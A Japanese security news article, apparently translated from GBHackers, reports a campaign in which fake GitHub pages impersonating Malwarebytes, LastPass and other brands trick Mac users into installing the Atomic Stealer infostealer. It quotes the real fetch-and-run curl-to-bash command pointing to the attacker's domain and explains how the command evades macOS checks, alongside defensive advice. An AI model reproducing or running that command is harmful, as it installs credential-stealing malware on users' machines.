サイバーニュース.jp

世界のサイバーなニュースを配信

武器化されたマルウェア:GitHubがMalwarebytes、LastPass、Citibank、SentinelOneなどを装ったマルウェアをホスト

カテゴリ:

, , , , , , , , ,

Macユーザーを標的とした大規模なキャンペーンが展開されており、偽のGitHubページを利用して、人気のある正規アプリケーションを装った情報窃取型マルウェアを配布しています。このキャンペーンでは、Malwarebytes for Mac、LastPass、Citibank、SentinelOneなど、多数の有名ブランドが模倣されています。

ブランドのなりすましは新しい手口ではありませんが、このキャンペーンは、サイバー犯罪者がユーザーを騙して有害なコードをインストールさせるための戦術が進化していることを示しています。LastPass Threat IntelligenceとMalwarebytesの脅威研究者は、macOS用正規アプリケーションのインストーラーをホストしていると偽る多数のGitHubページを特定しました。いくつかのケースでは、攻撃者はスポンサー付きのGoogle広告を購入し、ユーザーを公式ベンダーサイトではなくこれらの悪意のあるページに誘導しています。また、SEOポイズニング技術を利用して、「Malwarebytes GitHub macOS」のような検索クエリで偽のリポジトリを検索結果の上位に表示させています。

サイトに誘導されたユーザーは、「GET [アプリケーション名]」ボタンをクリックするよう促されます。これをクリックすると、新しく登録されたドメインからインストーラースクリプトをダウンロードして実行する指示が表示されます。多くの場合、ユーザーのプロンプトやコードレビューなしに実行され、macOSの保護機能やユーザーの警戒心を効果的に回避します。この作戦の目的は、ブラウザデータ、クリップボードの内容、保存された認証情報を収集する強力なmacOS情報窃取型マルウェアであるAtomic Stealer(AMOSとしても知られる)を展開することです。ユーザーがボタンをクリックすると、偽の製品をインストールするための指示が記載されたダウンロードページにたどり着きますが、実際には情報窃取型マルウェアがインストールされます。Malwarebytes for MacとThreatDownの両方がこの亜種を検出しブロックしますが、最初のソーシャルエンジニアリングは、注意力の低いユーザーに対して驚くほど効果を発揮しています。

### 感染経路の技術的分析

インストールプロセスは、ユーザーがmacOSのターミナルにコピー&ペーストするよう指示される単一行のシェルコマンドに完全に依存しています。

`bash /bin/bash -c “$(curl -fsSL https://gosreestr[.]com/hun/install.sh)”`

これは次のように機能します。

* `curl -fsSL`オプションは、リダイレクトに従い、HTTPエラー時には静かに失敗しながら、リモートスクリプトをサイレントにダウンロードします。
* `$(…)`で`curl`の呼び出しを囲むことで、ダウンロードされたスクリプトが直接外側の`bash -c`コマンドに渡されます。
* 外側のシェル呼び出しは、フェッチされたスクリプトをユーザーに内容を表示することなく即座に実行します。攻撃者は、中間URLをbase64でエンコードして真の宛先を難読化し、カジュアルな観察者による検出を困難にしています。ターミナルアプローチはmacOSの組み込みアプリケーション署名チェックをトリガーせず、管理者レベルのプロンプトも必要としないため、スクリプトはユーザーの権限で実行され、LaunchAgentsまたはLaunchDaemonsに永続的なエージェントをインストールすることができます。

### 偽ソフトウェアを避けるためのベストプラクティス

この手口や類似の戦術から身を守るために、Macユーザーは以下のガイドラインを採用すべきです。

* 未検証のウェブページ、フォーラム、GitHubリポジトリからコピー&ペーストされたコマンドは絶対に実行しないでください。`curl … | bash`のような構造を呼び出すコマンドは、高リスクとして扱うべきです。
* アプリケーションは常に開発者の公式ウェブサイトまたは信頼できるアプリストアからダウンロードしてください。疑わしい場合は、ベンダーのサポートチャネルを通じてダウンロードURLを直接確認してください。
* スポンサー付きの検索結果は無効にするか、注意して利用してください。これらの広告は、信頼できるブランドを装った悪意のあるページにリダイレクトする可能性があります。
* ウェブフィルタリングを含むリアルタイムのアンチマルウェア保護を導入してください。Malwarebytes for MacやThreatDownのようなソリューションは、インストール前にAtomic Stealerの亜種を検出してブロックします。
* 感染が疑われる場合は、`~/Library/LaunchAgents`および`/Library/LaunchDaemons`フォルダに見慣れない項目がないか検査し、疑わしいエントリを削除してください。
* 包括的な修復のためには、macOSの完全な再インストールを検討し、既知のクリーンなバックアップからのみファイルを復元してください。盗まれた認証情報による不正アクセスを防ぐために、すべてのアカウントパスワードを再初期化し、多要素認証を有効にしてください。

GitHubは一般的にオープンソースソフトウェアの信頼できるプラットフォームですが、このキャンペーンは、攻撃者が正規ブランドになりすますことで、いかにGitHubを武器化できるかを示しています。警戒心、慎重なダウンロード習慣、そして堅牢なエンドポイント保護が、このような急速に進化する脅威に対する最善の防御策であり続けます。

元記事:[https://gbhackers.com/weaponized-malware-github-hosts-malware-from-malwarebytes-lastpass-citibank-sentinelone-and-more/](https://gbhackers.com/weaponized-malware-github-hosts-malware-from-malwarebytes-lastpass-citibank-sentinelone-and-more/)

投稿をさらに読み込む